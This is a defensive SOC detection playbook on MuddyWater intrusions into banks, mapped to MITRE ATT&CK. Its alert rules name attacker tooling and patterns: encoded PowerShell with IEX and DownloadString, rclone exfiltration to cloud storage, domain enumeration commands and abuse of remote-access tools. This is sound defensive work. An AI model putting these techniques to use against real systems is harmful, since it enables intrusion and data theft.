SOC Detection Playbook for MuddyWater (Seedworm) tailored to Banking & Financial Services.

SOC Detection Playbook for MuddyWater (Seedworm) tailored to Banking & Financial Services. 

It is operator‑ready, mapped to MITRE ATT&CK (G0069), and built around actual MuddyWater tradecraft observed in 2025–2026 campaigns against financial organizations 1 2 3. 

 

SOC Detection Playbook 

MuddyWater (Iran‑Aligned APT) — Banking Environment 

 

1. Threat Profile (For SOC Context) 

Actor: MuddyWater (aka Seedworm, Static Kitten, Mango Sandstorm) 
Attribution: Iranian Ministry of Intelligence and Security (MOIS) 
Primary Objective in Banking: 

• Long‑term intelligence collection 

• Pre‑positioning in financial networks 

• Access brokerage (not immediate fraud or encryption) 

Recent activity confirms intrusions into U.S. banks and financial institutions using stealthy, admin‑like behavior rather than disruptive malware 4 5. 

 

2. SOC Detection Philosophy (Critical) 

Do not hunt ransomware. Hunt abnormal administration. 

MuddyWater: 

• Avoids noisy malware 

• Uses PowerShell, RMM tools, and cloud exfiltration 

• Often pretends to be ransomware without encryption (false flags) 6 7 8 

 

3. Priority Detection Stages (Kill Chain) 

 

Stage 1 — Initial Access 

Threat Behaviors 

• Microsoft Teams social engineering 

• Phishing with follow‑on interactive access 

• Exploitation of internet‑facing finance infrastructure 

MITRE 

• T1566 (Phishing) 

• T1190 (Exploit Public‑Facing App) 

9 10 

 

Detection Rules (SOC) 

Alert When: 

• Teams chat started by external tenant → includes screen‑sharing 

• User instructed to run commands or paste text into Run dialog 

• MFA changes occurring within 30 minutes of a Teams interaction 

Data Sources 

• Azure AD / Entra ID logs 

• Microsoft Defender for Office 

• Teams Audit Logs 

 

Analyst Triage Checklist 

• Was screen sharing initiated? 

• Did MFA methods or conditional access change? 

• Was AnyDesk / DWAgent installed shortly after? 

 

Stage 2 — Execution & Foothold 

Threat Behaviors 

• Obfuscated PowerShell loaders 

• Memory‑resident execution 

• No dropper binaries 

MITRE 

• T1059.001 (PowerShell) 

• T1106 (Native API) 

11 12 

 

Detection Rules 

Trigger High Severity if: 

• PowerShell with: 

• -EncodedCommand 

• IEX 

• DownloadString 

• PowerShell launched from: 

• Outlook 

• Teams 

• Excel / Word 

Data Sources 

• EDR 

• PowerShell Script Block Logs 

• Windows Event 4104 

 

Analyst Actions 

• Decode PowerShell immediately 

• Determine parent process legitimacy 

• Pivot on host for persistence artifacts 

 

Stage 3 — Persistence (Banking‑Specific Risk) 

Threat Behaviors 

• Registry Run keys 

• Scheduled Tasks 

• Legitimate remote management tools (RMM) 

MITRE 

• T1547 (Autostart) 

• T1219 (Remote Access Software) 

13 14 

 

Detection Rules 

Alert if: 

• AnyDesk / DWAgent installed outside IT baseline 

• New scheduled task running PowerShell 

• Registry Run keys created by non‑IT admin accounts 

Data Sources 

• EDR 

• Sysmon 

• Asset inventory 

 

Analyst Actions 

• Validate RMM install against CAB/change logs 

• Check persistence timestamps vs user activity 

• Snapshot system before cleanup 

 

Stage 4 — Credential Access & Lateral Movement 

Threat Behaviors 

• MFA manipulation 

• Domain enumeration 

• RDP movement toward financial systems 

MITRE 

• T1110 (Credential Access) 

• T1087 (Account Discovery) 

• T1021 (Remote Services) 

15 16 

 

Detection Rules 

Trigger alerts on: 

• MFA resets not initiated by IAM team 

• net user /domain or nltest execution 

• RDP from user workstation → server subnet 

Special Focus 

• AD accounts tied to: 

• Core banking 

• Treasury 

• Payment processing 

 

Analyst Actions 

• Identify credential exposure scope 

• Force password & token invalidation 

• Hunt for parallel sessions 

 

Stage 5 — Data Collection & Exfiltration 

Threat Behaviors 

• Cloud‑based exfiltration 

• Native compression tools 

• No immediate financial theft 

MITRE 

• T1560 (Archive Data) 

• T1041 (Exfiltration) 

17 18 

 

Detection Rules 

High‑confidence MuddyWater indicator: 

• rclone execution 

• makecab.exe used outside packaging servers 

• Outbound traffic to: 

• Wasabi 

• Backblaze 

• OneHub 

• TeraBox 

 

Analyst Actions 

• Isolate host immediately 

• Capture exfil indicators 

• Notify legal/compliance (regulatory exposure) 

 

Stage 6 — False‑Flag Ransomware (2026 Pattern) 

Observed Pattern 

• Extortion emails 

• Leak site references 

• No encryption activity 

This behavior has been explicitly observed in Chaos ransomware false‑flag operations attributed to MuddyWater 19 20 21. 

 

SOC Guidance 

If: 

• Extortion claim without encryption 

• RMM + data theft present 

Treat as APT incident, not criminal ransomware. 

 

4. Incident Response Playbook (Condensed) 

Containment 

• Disable accounts 

• Isolate hosts 

• Block RMM tools globally (temporary) 

Eradication 

• Remove persistence 

• Reimage high‑value systems 

• Rotate all exposed secrets 

Recovery 

• Restore clean backups 

• Re‑baseline admin behavior 

Reporting 

• Regulatory notification assessment (FFIEC, SEC, OCC) 

• Preserve evidence (nation‑state actor) 

 

5. SOC KPIs for MuddyWater Readiness 

Metric	Target
PowerShell decode time	< 10 minutes
RMM abuse detection	< 1 hour
MFA tampering alerts	Real‑time
Time to isolate host	< 15 minutes

 

Bottom Line for Banking SOCs 

• MuddyWater blends into legitimate IT operations 

• They want access and intelligence, not money—at first 

• False‑flag ransomware is intentional misdirection 

• EDR + identity telemetry is more important than signature AV